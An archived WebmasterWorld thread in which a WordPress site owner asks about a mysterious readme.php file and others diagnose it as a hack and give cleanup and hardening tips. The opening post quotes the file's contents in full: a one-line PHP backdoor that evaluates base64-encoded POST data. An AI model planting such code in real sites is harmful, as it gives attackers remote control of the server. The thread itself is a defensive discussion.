homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / Code, Content, and Presentation / WordPress
Forum Library, Charter, Moderators: lorax & rogerd

WordPress Forum

readme.php is this legit? Appeared suddenly.

 1:23 am on Jul 6, 2011 (gmt 0)

I have recently seen a huge amount of calls to a file in the root directory of wordpress called readme.php. Looking at the log files, its called by my internal pages after they load. I have done internal database and file searches for calls to this file to no avail. I can't find any calls to it, yet its my top accessed file. This file did not exist 3 weeks ago, and it appeared before I did a wordpress update.

The contents of the file are:
<? @eval(base64_decode($_POST['evl']));@require_once('/tmp/sessionbroker.php'); ?>

Does anyone else have readme.php in their root directory? Any guess to what its doing? My google traffic plummeted one day after this appeared. Coincidence?

I moved the file to a sequestered directory. My site appears unaffected by its being missing. But what is it and can it affect my rankings....



 1:31 am on Jul 6, 2011 (gmt 0)

looks like an old school hack..variation on the style of what gumblar used to get upto ..presumably your G searches just fell off a cliff too? if so then you are going to have to do major clean ups both at server and at any machine that ftps to the server.

hazard of running wordpress..


 2:39 am on Jul 6, 2011 (gmt 0)

Its a managed server, what should we be looking for to clean up? I can't see any spam injections, or other problems in the web pages. How does this exploit work? Why did I get a hit by google from it?


 3:20 am on Jul 6, 2011 (gmt 0)

<? @eval(base64_decode($_POST['evl']));@require_once

Search via google or whatever for just the part that I left on that line ( the part after require once can vary so its not important to the search for now ) ..don't bother putting quotes around it..

You'll find out more that way..like what it does , how it got there, how to get rid of it etc..Don't go looking with internet explorer as not all of the links that you'll see are "friendly"

Of those that you'll find helpful there is an IT blog in English by a Swiss guy called Murawski ..most of the rest of his place is in German.

Look at the wordpress.org info too, and also at sucuri..if its managed then normally they who are doing the managing will clean up the server ..for you ..but you'll still need to scan your own machines at the office or wherever ..


 4:07 am on Jul 6, 2011 (gmt 0)

Thanks...I did some further analysis. I can pinpoint the exact day that this readme.php file appeared by looking at my log files. The next day, I got whacked by google (99% down in traffic). I am amazed that google could hit like that as fast as it did. But its too much of a coincidence that this appeared and the traffic disappeared. There is no apparent problems that I can see when I look at the source code of the web pages, nothing in the cached versions, nothing odd.


 8:44 pm on Jul 6, 2011 (gmt 0)

Google can be very quick. I've seen browsers (looked like real browsers from the user agent and the pattern of page views) turn up from Google IPs, presumably with real humans behind them, within 24 hours of a bunch of questionable links added on the pages of a site (links subsequently removed as part of the normal process of site cleanup and spam removal).


 12:31 am on Jul 7, 2011 (gmt 0)

The weird thing about this is that I checked the ftp logs, transfer logs, etc., and I see no intrusions. Only my IP address and normal files that I would expect to do myself. Also do not see any spam, bad links or any indication of foul play except for this readme.php with its bad code, and the fact that it shows up after each regular page loads. Not sure what it could be doing or how its being called. (I searched the database and wordpress install/theme for readme.php and nothing showed up.

It would be nice if Wordpress had a plugin that could compare all the files that are in the current version of wordpress and check them against what is on your server and show the differences. That would save a lot of time.


 5:36 pm on Jul 7, 2011 (gmt 0)

You can make that comparison if you copy your files to your PC, install Tortoise SVN on your PC and use it to compare your files against their SVN repository.


 5:26 am on Jul 8, 2011 (gmt 0)

Do WordPress people and PHP people simply not talk to each other? The OP's two threads have taken off in entirely different directions :)



 6:11 am on Jul 8, 2011 (gmt 0)

Do WordPress people and PHP people simply not talk to each other?

I would suspect somewhere near 95% of WordPress users either never touch PHP, don't know WordPress is PHP, or if they have to touch code they follow step by step instructions to paste a snip of code in the functions.php code, (and still don't realize it is php).

For the most part it is thought of as "blog software", and more recently as a content management system. If they are on a host that has Scriptalicious or cPanel they may not even have to touch the wp-config.php file -- it may just auto-install and they download a free theme and start blogging.

"Code is poetry", and "Ignorance is bliss" ...at least until your ignorance lets your code get hacked because you allowed unregistered users to post comments with crap in them and and don't require new user comments to be held for moderation.


 1:36 am on Jul 12, 2011 (gmt 0)

Are there any malware detector plugins that can alert you when you have been attacked? I still would not have know had I not looked at my log files and seen the strange file being called. How can you tell when you have been hit so you can go back to a previous backup ASAP before google penalizes you. This seems like a serious problem with wordpress.

Also, what can you do to protect your wordpress from these hacking attacks?


 2:26 am on Jul 12, 2011 (gmt 0)

Is the site 100% wordpress? (The reason I ask is any other scripts, content management systems, etc.. on the site could have left the door open).

Always keep wordpress updated is the #1 rule. Last I heard there are a half-million installs of the self-hosted version - so it's a big target for hackers -- as soon as they find an exploit, they attack as many sites as possible.

Some rules:

Don't use "admin" for the admin name -- that leaves hackers only having to guess the password (which can be done by automated means).

Don't allow code in comments.

Don't allow new users to post comments until you moderate them.

Don't download plug-ins, themes, or other add-ons from sites that you don't know you can trust.

Make sure there are index.php files in all directories (empty files named index.php, index.html, or index.htm will keep hackers from browsing your site's WP folders looking for attack points).

Don't display "Proudly powered by Wordpress version X.xx" on your web facing pages -- this is just an open invite to hackers and lets them know more than they need to about the site.

Install wordpress somewhere other than the default installation folder.

For more tips, see: [codex.wordpress.org...]

Create an account and and ask around in the forums at [wordpress.org...] ... .check the ratings history or updates, visit the author's site, and otherwise "do due dilligence" before installing plug-ins or add-ons -- and only install what you absolutely need -- don't try every cool looking new widget. If you do try something out and don't use it, delete it and everything that came with it.

there's a few ideas...


 12:54 am on Jul 15, 2011 (gmt 0)

Good points. Is it possible that Google's malware detector did not detect this, but google's robot saw something it did not like caused by this malware and gave a -60 penalty. Or is it just a coincidence that the malware hit a day before this penalty? I don't understand why the webmaster tools detector did not see this. Hoping the penalty will clear on its own, as I restored a backup from several months back this morning and there is no strange file anymore. So I am clean, but getting little traffic.

I did implement some of your suggestions. There is a good plugin called Login Lockdown, that lets you try 3 times and then blocks you for an hour or however long you want. Logs IP addresses and blocks those that are persistent.

Global Options:
 top home search open messages active posts  

Home / Forums Index / Code, Content, and Presentation / WordPress
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved